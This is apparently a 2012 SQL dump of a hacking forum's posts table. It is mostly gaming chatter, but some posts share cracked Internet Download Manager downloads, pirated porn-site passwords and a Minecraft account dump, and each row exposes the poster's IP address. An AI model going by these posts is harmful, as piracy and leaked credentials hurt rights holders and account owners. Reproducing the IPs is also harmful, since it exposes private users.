YouTube grabber. IDM can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video. ? Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager. ? Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans. ? Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. ? Built-in Scheduler. IDM can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it?s done. ? IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It?s possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes. ? IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers. ? IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password. ? Download All feature. IDM can add all downloads linked to the current page. It?s easy to download multiple files with this feature. ? Download Categories. IDM can be used to organize downloads automatically using defined download categories. ? Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc. ? IDM is multilingual. hat\'s new in version 6.12 build 22? (Released: october 10, 2012) - Added support for Firefox 18 - Fixed bugs ~~~~~~~~~~~ !Install Notes! ~~~~~~~~~~~ 1]Install IDM 2]Use crack 3]Enjoy!! [/quote] [img]http://upit.cc/i/04a9a9f4.png[/img] [code]http://rapidgator.net/file/49888998/IDM.6.12.22.Incl.Crack-MUFTAKiS.rar.html http://ul.to/i56xq4v2 http://bitshare.com/files/pb5fywxx/IDM.6.12.22.Incl.Crack-MUFTAKiS.rar.html [/code] [color=#FF0000]skin[/color] [img]http://upit.cc/i/10bb4987.png[/img] [img]http://upit.cc/i/4b7d2d18.png[/img] [CODE]http://ul.to/rirm75j9 http://bitshare.com/files/wp8dqdl9/IDM_Toolbar_Skin.rar.html http://rapidgator.net/file/49889168/IDM_Toolbar_Skin.rar.html[/CODE] [img]http://upit.cc/i/b69df077.gif[/img] [img]http://upit.cc/i/a3d890fc.png[/img]', '106.209.130.121', '1792115321', '0', '0', '255', '1350101797', '1', '340dbfcab5f92a71da6d59aca81462ef', '0', '1350101797'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4386', '764', '4036', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '1', 't3h jok3r', '1350101902', '[quote=\'Anonymous™\' pid=\'4036\' dateline=\'1349787707\'] Error (509) This account\'s public links are generating too much traffic and have been temporarily disabled! [/quote] Link works for me too. Are you sure?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6ed6219063f64086eed959d9f9b66204', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4387', '837', '0', '54', '[13 October ]Brazzers,Bangbros,Mofos,Reality Kings....and many more.100 % working', '0', '255', 'sbhshroy2', '1350102258', 'click here http://adf.ly/Ddrrq', '106.209.130.121', '1792115321', '0', '0', '0', '0', '1', 'cdec5697db597495f0d9178ce2b6cc29', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4388', '838', '0', '54', 'realitykings premium acount for 13/10/2012', '0', '255', 'sbhshroy2', '1350102320', 'click here http://adf.ly/DdK5d', '106.209.130.121', '1792115321', '0', '0', '0', '0', '1', 'd32d93126b45a21797546993394bf36f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4389', '839', '0', '54', '[13.OKT]Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 13.OKT.2012', '0', '255', 'sbhshroy2', '1350102366', 'click here http://adf.ly/DdKR2', '106.209.130.121', '1792115321', '0', '0', '0', '0', '1', 'd06504af52342d57a5aa54c8f76111fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4390', '840', '0', '4', 'Its andrew', '0', '256', 'Andrew', '1350102912', 'new here i dont know squat about hacking or coding but id like to learn Breshie brought me here :)', '76.105.69.111', '1281967471', '0', '0', '0', '0', '1', '0dc9d9693addcfd0c71f8e3e100c8a3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4391', '840', '4390', '4', 'RE: Its andrew', '0', '3', '??????????¢™', '1350103006', 'Welcome to LH, We hope you enjoy your stay.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5659f682fb1d4da8eae6824db91e1614', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4392', '841', '0', '71', 'whats the best game ever made.', '0', '257', 'XxTREYZxX', '1350112172', 'hello L33T HACKING this is my first post i wasjust wondering what is the best game ever made. thanks L33T', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'f4ae7e9060e43039651ba9d5deec19fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4393', '827', '4326', '76', 'RE: Playstation names', '0', '254', 'Greed', '1350112207', 'No problem bro lol, I even got a whole week off again from work! so like 24 hrs of gaming!! and being on here and btw I like the color of the forums.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '07ad408a7a560c608a6281ac1f9ba2bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4394', '692', '3518', '71', 'RE: COD Black OPs or COD MW3?', '0', '257', 'XxTREYZxX', '1350112717', 'i would prefer mw3 because its way harder and more competive and black ops is for all the noobs because not many people play it', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '1d79e9f235bb39af12e4f88b06efa1b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4395', '833', '4375', '3', 'RE: New feature coming up!', '0', '222', 'Exposé', '1350112796', 'Oh is this the cometchat thinge? Nice hope it is awesome :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '194e4c83272c3117047b60a90c1f2959', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4396', '828', '4327', '71', 'RE: Planetary Anhiliation', '0', '257', 'XxTREYZxX', '1350112824', 'yeah thats pretty awesome thank and nice thread', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'a15217092ce2067da80cf575bb12b4ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4397', '840', '4390', '4', 'RE: Its andrew', '0', '222', 'Exposé', '1350112830', 'Lol whats up Andrew. Welcome to L33thacking. Hope you enjoy your stay', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '06a9deb0ab1dcd18ea2eb73a878cc9cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4398', '828', '4327', '71', 'RE: Planetary Anhiliation', '0', '254', 'Greed', '1350112918', 'Thank you kind sir, Cant wait for it to come out. Hope it comes out in the next year or so.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '6eb43b31064eda7105995c885ebf6081', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4399', '827', '4326', '76', 'RE: Playstation names', '0', '257', 'XxTREYZxX', '1350112932', 'haha iv already got your psn name but havent had time to add you', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'c8022399fa2b9fd0f8b8c7a734651f37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4400', '842', '0', '71', 'Assasins creed 3', '0', '254', 'Greed', '1350113037', 'So I\'ve bet you all heard by now Assassin creed 3, Well I pre ordered it on my ps3. Any other who is waiting for it to come out? What is the first thing your going to do? The First thing im going to do on Assassin\'s creed 3 is tomahawk a guy. lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'f39d8cadbd9beacc08b9c9cb3d0a3c17', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4401', '802', '4184', '77', 'RE: MW3 Knockback Lobby | FREE', '0', '257', 'XxTREYZxX', '1350113047', 'damm i am currently on ps3, i sold my xbox last month', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '6aba4cab62c18cea2e95161606ddf843', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4402', '815', '4267', '73', 'RE: your favourite iOS games', '0', '257', 'XxTREYZxX', '1350113239', 'mine would probably have to be dead trigger i love to play arena', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '889b1652c2138398ca2181587c913ede', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4403', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350113251', 'yeah i\'ll try looking for you, you should get back into it, im going to verify my dragonfable account with it today hopefully. But yeah you all should start playing it, I\'ll make a guild for all of us if you can join and heck when I get paid I could buy some of you Member\'s, if you want.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'b0c79ebe5e14ebedc59faad1e7d2e0e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4404', '843', '0', '73', 'whats the best IOS game ever', '0', '257', 'XxTREYZxX', '1350113351', 'hey i was just wondering what do you think is the best game ever', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '213958932fcc908774982d06f79517c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4405', '827', '4326', '76', 'RE: Playstation names', '0', '254', 'Greed', '1350113410', 'lol just add me now, it doesn\'t take time. Just get on your ps3 then add me then log out, bam boom baaazing Done!', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '4bf26c2aacc9f0f91d6422b204b5a3b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4406', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '257', 'XxTREYZxX', '1350113499', 'yeah im havent played in like 3 years i was level 48 and i was a guardian,:)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'a47b23dcf932b2a4c4dee82ee7c2b82e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4407', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '257', 'XxTREYZxX', '1350113596', 'i defiantly play minecraft im like a all-ROUNDER gamer', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '4805eba21c8394c7579a0c1bee1237a7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4408', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '257', 'XxTREYZxX', '1350113703', 'yes i only hack on single player', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '9bac929cdb477b10fc162d18cfccdda6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4409', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '257', 'XxTREYZxX', '1350113789', 'could you please put a virus scan and i will try it out', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '557d670086627495df59f791fc8d2b98', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4410', '569', '2813', '74', 'RE: 21,000 Minecraft Account Dump', '0', '257', 'XxTREYZxX', '1350113882', 'thanks and great thread, keep up the good work', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '0eb025fd7aa518fbd50024c8b8cfe0fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4411', '481', '2342', '74', 'RE: Runescape Accounts', '0', '257', 'XxTREYZxX', '1350113941', 'sorry i havent played runescape and dont plan on playing but great thread', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'adaae704bb47b5ef11c2e838f4510d8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4412', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '257', 'XxTREYZxX', '1350114055', 'thank you very much this is a great thread and its very handy ,thank you sir', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '3dea4f778a5eec8accaba974465280af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4413', '787', '4097', '75', 'RE: Saints Row The Third Cheats + More!', '0', '257', 'XxTREYZxX', '1350114181', 'this is a great HQ post and this is very helpful and handy. lol my favorite weapon is the penetrator keep up the good work', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'c2638d68cc1edc5cb592df1101705c0a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4414', '775', '3997', '75', 'RE: GTA San Andreas Cheats', '0', '257', 'XxTREYZxX', '1350114314', 'great post and a helpful thread', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', 'c38a57f5a86822ff790f26cc228cb2d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4415', '842', '4400', '71', 'RE: Assasins creed 3', '0', '257', 'XxTREYZxX', '1350114411', 'im probably going to jump of a high as building and commit suicide', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '02865f09eb462b68179e21de99392870', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4416', '828', '4327', '71', 'RE: Planetary Anhiliation', '0', '257', 'XxTREYZxX', '1350114487', 'yeah it might come out in like April or somthing', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '31efa06c6ccc532a76b28c3319d333a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4417', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '257', 'XxTREYZxX', '1350114601', 'great tutorial on how to create a logo +rep for the HQ post, love it keep at it', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'dab6153899cb52925311ce9b90469505', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4418', '844', '0', '73', 'TEMPLE RUN CHEAT (UNLIMITED RUN)', '8', '257', 'XxTREYZxX', '1350115462', 'TEMPLE RUN CHEAT (UNLIMITED RUN) STEPS 1.GET YOUR IPOD READY 2.PLAY TEMPLE RUN (INSTALL IF YOU DON\'T HAVE IT 3.GO TO OPTIONS AT THE MAIN MENU 4.TURN THE TUTORIAL ON 5.GO BACK THEN PLAY 6.WHEN YOU GET TO THE PART WHERE IT TEACHES YOU TO TURN AS YOUR ABOUT TO TURN SWIPE ACROSS 3 TIMES INSTEAD OF ONCE AND YOU SHOULD TURN AROUND THEN YOU WILL KEEP ON RUNNING FOREVER 7.KEEP IN TRYING IF IT DOES NOT WORK 8.TRUST ME IT WORKS 9.THANKS HOPED YOU ENJOYED l33T', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '3c76e6692467b7b7b7341f14a0ca7670', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4419', '845', '0', '72', 'whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350115753', 'hey guys whats better ps3 or xbox', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'd64a3b357ba4fe0ac26a63d75db60809', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4420', '846', '0', '74', 'another great pvp', '0', '257', 'XxTREYZxX', '1350116135', 'here\'s a great pvp for mincraft its actually based on a archer games you start with a bow and you can select your kit hope you enjoy ip:ag1.playeoe.com you can change the number from 1 to 9 for a different map,host and lobbby', '203.104.11.2', '-882373886', '1', '0', '257', '1350163588', '1', '63ecdfcb21ad8e060dfa55de1d477f9a', '0', '1350163588'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4421', '190', '4366', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350116520', 'inurl:\"pastebin.com\" & intext:\"', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'be164587ed1628d9ea1922df45919720', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4422', '842', '4400', '71', 'RE: Assasins creed 3', '0', '254', 'Greed', '1350116572', 'lol i accidentally did that on assassin creed 1, tried to jump in the hay but missed the hay and died lol.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '2e9be16372106051edd7a2df751153e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4423', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350116722', 'I prefer the ps3, been playing it since ps1 and controllers are smaller and easier to handle, to me.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '83fc2d43b5dd674d7741be9c0ae4db7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4424', '840', '4390', '4', 'RE: Its andrew', '0', '199', 'Anonymous™', '1350116808', 'Welcome to L33thacking.net!', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'e719e59002169577730a90460e5d8dee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4425', '847', '0', '76', 'add me on ps3', '0', '257', 'XxTREYZxX', '1350116850', '[b]add me at:xEP1C_SC0P3Sx I PLAY COD MW3 , ASSASSINS CREED 1,2, RELEVATIONS,GTA 5,BLACK OPS,[/b]', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '8f6d3047ec67272dade9093263271184', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4426', '842', '4400', '71', 'RE: Assasins creed 3', '0', '257', 'XxTREYZxX', '1350118587', 'haha fail, have you finished all of them', '203.104.11.2', '-882373886', '1', '1', '0', '0', '1', '50f275488f2552c74055150ed42498a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4427', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350118689', 'yeah i believe that to, and its known to be way better graphics wise :)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '0b95fce46ecb7d1b85783aee6f6bf006', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4428', '726', '3653', '13', 'RE: Dorks', '0', '258', 'PiXEL^OG', '1350118986', 'The vul link dose not work anymore , Thanks for the heads up though', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '54751642c79ac00edbe27e52f6eda354', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4429', '827', '4326', '76', 'RE: Playstation names', '18', '257', 'XxTREYZxX', '1350119044', 'yeah but i have to go all the way down stairs then reach my hand out press the button turn on the tv, sign in add you,turn it off again, turn the tv off then walk all the way back up the stairs and then im done :)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'e28f8ee7e3e46c23528aaf6c321db196', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4430', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350119317', 'XBOX 360 ALL THE WAY!!! Its MUCH easier to pirate games on it , Nowadays games cost like over a 100 dollars and i don\'t want to waste that much money.', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd4c50a89e1829aef9c77be81723733cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4431', '842', '4400', '71', 'RE: Assasins creed 3', '0', '258', 'PiXEL^OG', '1350119443', 'Im more than a 100% sure that everyone is gonna do the first mission first lmao But yeah for me im probably gonna hunt some deer #yummy', '139.190.235.246', '-1950422026', '0', '0', '258', '1350119460', '1', 'ea93c76ef3bb2a7290ec0330f61259b5', '0', '1350119460'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4432', '842', '4400', '71', 'RE: Assasins creed 3', '0', '257', 'XxTREYZxX', '1350119532', 'hmmm dear lol and yer i will do the first mission first duh', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'bff0f296c423ae496ff3d0c2634ae5af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, 